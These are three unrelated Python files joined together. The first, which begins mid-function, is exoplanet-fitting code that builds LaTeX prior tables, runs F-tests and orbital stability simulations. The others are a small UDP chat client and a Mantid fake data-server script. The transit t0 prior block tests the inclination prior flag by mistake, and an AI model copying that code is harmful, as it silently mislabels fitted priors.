text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
if obj.lamb_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.lamb_norm_pr[i][0],obj.lamb_norm_pr[i][1],"$^2$"
elif obj.lamb_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.lamb_jeff_pr[i][0],obj.lamb_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.lamb_bound[i][0],obj.lamb_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.i_norm_pr[i][0],obj.i_norm_pr[i][1],"$^2$"
elif obj.i_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.i_jeff_pr[i][0],obj.i_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.i_bound[i][0],obj.i_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.Node_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.Node_norm_pr[i][0],obj.Node_norm_pr[i][1],"$^2$"
elif obj.Node_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.Node_jeff_pr[i][0],obj.Node_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.Node_bound[i][0],obj.Node_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.t0_norm_pr[i][0],obj.t0_norm_pr[i][1],"$^2$"
elif obj.t0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.t0_jeff_pr[i][0],obj.t0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.t0_bound[i][0],obj.t0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Pl.Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
if obj.pl_rad_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_rad_norm_pr[i][0],obj.pl_rad_norm_pr[i][1],"$^2$"
elif obj.pl_rad_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_rad_jeff_pr[i][0],obj.pl_rad_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_rad_bound[i][0],obj.pl_rad_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
if obj.pl_a_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_a_norm_pr[i][0],obj.pl_a_norm_pr[i][1],"$^2$"
elif obj.pl_a_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_a_jeff_pr[i][0],obj.pl_a_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_a_bound[i][0],obj.pl_a_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_lintr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_lintr_norm_pr[i][0],obj.rv_lintr_norm_pr[i][1],"$^2$"
elif obj.rv_lintr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_lintr_jeff_pr[i][0],obj.rv_lintr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_lintr_bounds[i][0],obj.rv_lintr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_quadtr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_quadtr_norm_pr[i][0],obj.rv_quadtr_norm_pr[i][1],"$^2$"
elif obj.rv_quadtr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_quadtr_jeff_pr[i][0],obj.rv_quadtr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_quadtr_bounds[i][0],obj.rv_quadtr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.rvoff_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rvoff_norm_pr[i][0],obj.rvoff_norm_pr[i][1],"$^2$"
elif obj.rvoff_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rvoff_jeff_pr[i][0],obj.rvoff_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rvoff_bounds[i][0],obj.rvoff_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.jitt_norm_pr[i][0],obj.jitt_norm_pr[i][1],"$^2$"
elif obj.jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.jitt_jeff_pr[i][0],obj.jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.jitt_bounds[i][0],obj.jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
if obj.GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_rot_norm_pr[i][0],obj.GP_rot_norm_pr[i][1],"$^2$"
elif obj.GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_rot_jeff_pr[i][0],obj.GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_rot_bounds[i][0],obj.GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
if obj.GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_sho_norm_pr[i][0],obj.GP_sho_norm_pr[i][1],"$^2$"
elif obj.GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_sho_jeff_pr[i][0],obj.GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_sho_bounds[i][0],obj.GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_off_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_off_norm_pr[i][0],obj.tra_off_norm_pr[i][1],"$^2$"
elif obj.tra_off_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_off_jeff_pr[i][0],obj.tra_off_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_off_bounds[i][0],obj.tra_off_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_jitt_norm_pr[i][0],obj.tra_jitt_norm_pr[i][1],"$^2$"
elif obj.tra_jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_jitt_jeff_pr[i][0],obj.tra_jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_jitt_bounds[i][0],obj.tra_jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.tra_doGP == True:
if obj.tra_gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_rot_str[i]), width = 30)
if obj.tra_GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_rot_norm_pr[i][0],obj.tra_GP_rot_norm_pr[i][1],"$^2$"
elif obj.tra_GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_rot_jeff_pr[i][0],obj.tra_GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_rot_bounds[i][0],obj.tra_GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.tra_gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_sho_str[i]), width = 30)
if obj.tra_GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_sho_norm_pr[i][0],obj.tra_GP_sho_norm_pr[i][1],"$^2$"
elif obj.tra_GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_sho_jeff_pr[i][0],obj.tra_GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_sho_bounds[i][0],obj.tra_GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def f_test(obj, obj2 = None, alpha = 0.01):
chi2 = obj.fit_results.chi2
ndata = len(obj.fit_results.jd)
par2 = obj.fit_results.mfit
# self.value_reduced_chi2.setText("%.4f"%(fit.fit_results.reduced_chi2))
#self.value_loglik.setText("%.4f"%(fit.fit_results.loglik))
# self.value_loglik.setText("%.4f"%(fit.loglik))
if obj2 == None:
obj2 = dill.copy(obj)
obj2.npl = 0
obj2.fitting()
else:
obj2 = dill.copy(obj2)
if len(obj.fit_results.jd) != len(obj2.fit_results.jd):
print("not the same data, test make no sense")
return
chi1 = obj2.fit_results.chi2
par1 = obj2.fit_results.mfit
print(chi2,par1)
#chi1_red = chi1/(ndata - par1)
chi2_red = chi2/(ndata - par2)
#raw_input("chi1_red = %s, Press Enter to continue <Enter>"%chi1_red)
#F = (chi1 - chi2)/chi2_red
F = ((chi1 - chi2)/(par2-par1))/chi2_red
#raw_input("alpha = %s, Press Enter to continue <Enter>"%alpha)
#print F, chi1_red, chi2_red
p_value = pdf.f.sf(F, par2 - par1, ndata - par2, loc=0, scale=1)
print("""
\chi^2 null model = %s
\chi^2 tested model = %s
N parametrs null model = %s
N parametrs tested model = %s
F value = %s
p-value = %s
alpha value = %s
"""%(chi1,chi2,par1,par2,F,p_value,alpha))
if float(p_value) < alpha:
print("Null hypothesis rejected")
print("Probability = ", (1.0-float(p_value))*100.0,'%')
else:
print("Null hypothesis cannot be rejected")
def a_to_P(a,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
T = np.sqrt( (a*AU)**3.0 * (2.0*np.pi)**2.0 /(GMSUN*(m0)))
T = T /86400.0
return T
def P_to_a(P,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
P = P * 86400.0
a = ((P**2.0 * (GMSUN*(m0)))/(4.0*(np.pi)**2.0))**(1.0/3.0)
return a/AU
def plot_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.fit_results.rv_model.jd
y = obj.fit_results.rv_model.o_c
y_err = obj.fit_results.rv_model.rv_err
idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.gp_model_curve
else:
x_model = x
mu,var,std = obj.gp_model_data
#print(mu[0:10])
#print(y[0:10])
for i in range(obj.filelist.ndset):
plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
def plot_transit_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.tra_data_sets[0][0]
y = obj.tra_data_sets[0][1]
y_err = obj.tra_data_sets[0][2]
#idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.tra_gp_model_curve
else:
x_model = x
mu,var,std = obj.tra_gp_model_data
#print(mu[0:10])
#print(y[0:10])
#for i in range(obj.filelist.ndset):
#plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.errorbar(x,y, yerr=y_err, fmt=".",color=colors[0], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
####################### mass_semimajor ###########################################
def mass_a_from_Kepler_fit(a,npl,m0):
'''Calculates the actual masses and Jacobi semimajor axes of a
system for assumed sin(i) using the parameters P, K and e from a Kepler fit
The output is now in Mjup and AU
'''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
incl = 90.0
sini = np.sin(PI*(incl/180.0))
mass = np.zeros(npl+1)
ap = np.zeros(npl)
pl_mass = np.zeros(npl)
mpold = pl_mass
#*******G is set to be unit, and s, m, kg as unit of time, length and mass
#***** and there is a reason for that! later I might correct for that.
mtotal = m0
f = 5e-6
for i in range(npl):
T = a[5*i+1]*86400.0
mass[0] = m0
# we need innitial guess for each planet mass
dm = 0
mass[i+1] = abs(a[5*i])*(T*(m0)**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = m0
mass[i+1] = abs(a[5*i])*(T*(m0 + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
else:
mtotal = m0
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(a[5*i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(npl):
ap[i] = ap[i]/AU # to be in AU
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
def run_stability(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
##### crate the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(timemax)*365.25 # make it is days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.params.stellar_mass).encode()), bytes(str(obj.npl).encode() ) ))
for j in range(obj.npl):
getin_file.write(b'%s \n'%bytes(str(obj.fit_results.mass[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.fit_results.a[j]).encode()),
bytes(str(obj.params.planet_params[7*j + 2]).encode()),
bytes(str(obj.params.planet_params[7*j + 5]).encode()),
bytes(str(obj.params.planet_params[7*j + 3]).encode()),
bytes(str(obj.params.planet_params[7*j + 6]).encode()),
bytes(str(obj.params.planet_params[7*j + 4]).encode() )) )
getin_file.close()
# runnning fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
#print('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%obj.GR_step)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
def run_stability_arb(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
##### crate the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(timemax)*365.25 # make it is days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.arb_st_mass).encode()), bytes(str(obj.npl_arb).encode() ) ))
for j in range(9):
if obj.pl_arb_use[j] == True:
getin_file.write(b'%s \n'%bytes(str(obj.mass_arb[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.a_arb[j]).encode()),
bytes(str(obj.e_arb[j]).encode()),
bytes(str(obj.i_arb[j]).encode()),
bytes(str(obj.w_arb[j]).encode()),
bytes(str(obj.Node_arb[j]).encode()),
bytes(str(obj.M0_arb[j]).encode() )) )
else:
continue
#
getin_file.close()
# runnning fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl_arb):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
|
chatClient.py
|
import socket
import threading
import time
tLock = threading.Lock()
shutDown = False
def receving(name, sock):
while not shutDown:
try:
while True:
data, addr = sock.recvfrom(1024)
print str(data)
except Exception as e:
if str(e) == "[Errno 35] Resource temporarily unavailable":
continue
else:
print e
else:
pass
finally:
pass
host = '127.0.0.1'
port = 0
server = ('127.0.0.1', 5000)
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((host, port))
s.setblocking(0)
rT = threading.Thread(target = receving, args = ("RecvThread", s))
rT.start()
alias = raw_input("Name: ")
message = raw_input(alias + "->")
while message != 'q' and not shutDown:
if message != '' :
s.sendto(alias + ": " + message, server)
time.sleep(0.2)
message = raw_input(alias + "->")
else:
client_input = raw_input("end? \n 'y' to quit\n 'n' to continue\n")
if "y" in client_input:
shutDown = True
elif "n" in client_input:
message = "reconnecting..."
else:
pass
rT.join()
s.close()
|
fake_server.py
|
from __future__ import (absolute_import, division, print_function)
from mantid import AlgorithmManager, ConfigService
from mantid.simpleapi import FakeISISHistoDAE
from threading import Thread
facility = ConfigService.getFacility().name()
ConfigService.setFacility('TEST_LIVE')
def startServer():
FakeISISHistoDAE(NPeriods=5, NSpectra=10, NBins=100)
# This will generate 5 periods of histogram data, 10 spectra in each period,
# 100 bins in each spectrum
try:
thread = Thread(target=startServer)
thread.start()
thread.join()
except Exception as e:
print(e)
alg = AlgorithmManager.newestInstanceOf('FakeISISHistoDAE')
